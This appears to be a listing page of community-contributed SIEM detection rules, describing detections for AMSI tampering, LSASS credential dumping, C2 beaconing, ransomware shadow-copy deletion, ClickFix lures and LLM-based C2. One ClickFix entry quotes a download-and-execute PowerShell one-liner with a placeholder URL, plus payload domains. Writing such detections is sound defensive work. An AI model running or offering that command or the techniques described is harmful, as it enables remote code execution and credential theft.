Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

60,137 detections

Detects attempts to bypass or tamper with the Antimalware Scan Interface (AMSI) in-memory by monitoring command lines of common script-hosting processes (e.g., PowerShell, WScript, Rundll32) for strings indicative of AmsiScanBuffer patching, reflection, or manual configuration of AMSI initialization states.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects the creation of a remote thread in a process by another process, excluding self-injection. This behavior is a common indicator of process injection techniques used to execute code within the address space of a target process.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects processes attempting to obtain high-privileged handles (e.g., VM_READ/ALL_ACCESS) to the lsass.exe process. Accessing lsass.exe is a common method for credential dumping, often used by malware or red-team tools to extract sensitive credentials from memory. This rule monitors process access events and ignores known benign or administrative processes that legitimately access LSASS.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
This rule detects potential command-and-control (C2) activity by correlating the creation of known Cobalt Strike or Sliver framework named pipes with subsequent repeated HTTP/S network beaconing from the same process or host. The rule identifies processes establishing suspicious named pipes, then looks for persistent network connections to standard web ports (80, 443) within a 30-minute window, flagging instances where significant beaconing count is observed.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
This rule detects potential DNS tunneling activities often used for Command and Control (C2) communication. It monitors for high volumes of DNS requests involving records commonly abused for tunneling (TXT, NULL, CNAME) from a single host to a specific parent domain. It further identifies suspicious patterns characterized by long, high-entropy subdomain labels (>45 characters) and a high frequency of distinct labels, which are indicative of encoded C2 traffic.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects the loading of known vulnerable kernel drivers commonly used for Bring Your Own Vulnerable Driver (BYOVD) attacks, followed within 15 minutes by administrative attempts to stop, delete, or kill common security product processes or services.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects the use of native Windows utilities (vssadmin, wbadmin, bcdedit, wmic) to delete shadow copies, backup catalogs, or modify boot configuration data to disable recovery. This behavior is commonly associated with ransomware and data destruction attacks intended to prevent system restoration.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects instances where a user grants consent to an unverified OAuth application with high-privilege scopes (e.g., Mail.Read, Directory.Read.All), followed by an authentication event using that same application ID from a different IP address within 24 hours. This behavior is indicative of potential consent phishing or OAuth token abuse, where an adversary harvests tokens to maintain persistent, remote access to email or directory services.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
5 days ago
000
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
12 days ago
004
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
12 days ago
104
This rule detects the execution of browser automation and testing tools (such as Playwright, Puppeteer, Selenium, and various browser drivers) when initiated by common, non-development-related parent processes like Microsoft Office applications, Explorer, or service hosts. This behavior is indicative of potential malicious activity, such as automated credential harvesting or unauthorized web interaction initiated by a compromised document or process.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
103
Detects anomalous GitHub audit log activity indicative of a potential supply-chain compromise. The rule identifies workflows or automated entities (Bot/App) that access sensitive Action secrets followed by the publishing of packages to public registries like PyPI or npm. This activity can represent the precursor steps of token-theft-driven malicious package injection.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
303
Detects the execution of known living-off-the-land binaries or network utilities initiated by or involving processes related to the Semantic Kernel framework (e.g., SKAgent, kernel.run). This pattern is often indicative of automated execution, potentially associated with agent-based activity or malicious orchestration leveraging AI framework components.
avatar
Ishaan S@isrv
avatar
Hunters
12 days ago
004
Detects anomalous executions of ctfmon.exe that deviate from known-good parent process patterns, such as unexpected parent processes (e.g., script hosts, LOLBins) or execution from locations other than C:\Windows\System32\ctfmon.exe. This rule is designed to help identify potential masquerading or process injection associated with exploitation attempts, including CVE-2026-45586.
avatar
Rudra Verma@Rudraverma
avatar
Detections.ai Community
19 days ago
2025
Detects removable-media/storage interaction events initiated by the PlugX side-loaded process chain (GRrte.exe / Jarte.exe), consistent with the PlugX core's drive-type query and removable-media ejection behavior (GetDriveTypeW / DeviceIoControl)
avatar
Kaung Khant Ko@kaungkhantko
avatar
Hunters
17 days ago
6013
This rule monitors for various indicators of compromise (IOCs) including malicious domains, IP addresses, specific URI paths, file names, and file hashes. It aggregates telemetry from network, file, process, and certificate events to detect potential threats interacting with known bad infrastructure or executing suspicious files associated with malware campaigns.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
5 days ago
000
Detects the use of PowerShell to modify Microsoft Defender antivirus preferences by adding exclusion paths or processes. This behavior is indicative of an attacker attempting to bypass security software detection by excluding their malicious tools or staging areas from scanning.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
11 days ago
103
Detects the installation of unauthorized AI-related browser extensions followed by outbound network communication from the browser process to known external AI service API endpoints within one hour. This behavior is indicative of potential data exfiltration via shadow AI tools, bypassing standard enterprise DLP controls.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
5 days ago
000
Detects multiple reconnaissance commands executed by PowerShell processes running as the SYSTEM account. This behavior is indicative of an attacker attempting to enumerate domain trusts, group memberships, or user sessions on a host to facilitate lateral movement or privilege escalation.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
11 days ago
303
This rule detects potential ClickFix/InstallFix attacks where a user is socially engineered to copy and paste a malicious command from a website that mimics a legitimate developer tool installation (e.g., Claude Code, NotebookLM). The detection flags the use of common download-and-execute cmdlets (e.g., irm, iwr, iex) within common Windows shell interpreters while excluding known legitimate vendor install domains.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
5 days ago
000
This rule detects potential ClickFix/InstallFix attacks where a user is socially engineered to copy and paste a malicious command from a website that mimics a legitimate developer tool installation (e.g., Claude Code, NotebookLM). The detection flags the use of common download-and-execute cmdlets (e.g., irm, iwr, iex) within common Windows shell interpreters while excluding known legitimate vendor install domains.
avatar
Arnold Chan@slaz
avatar
Hunters
5 days ago
000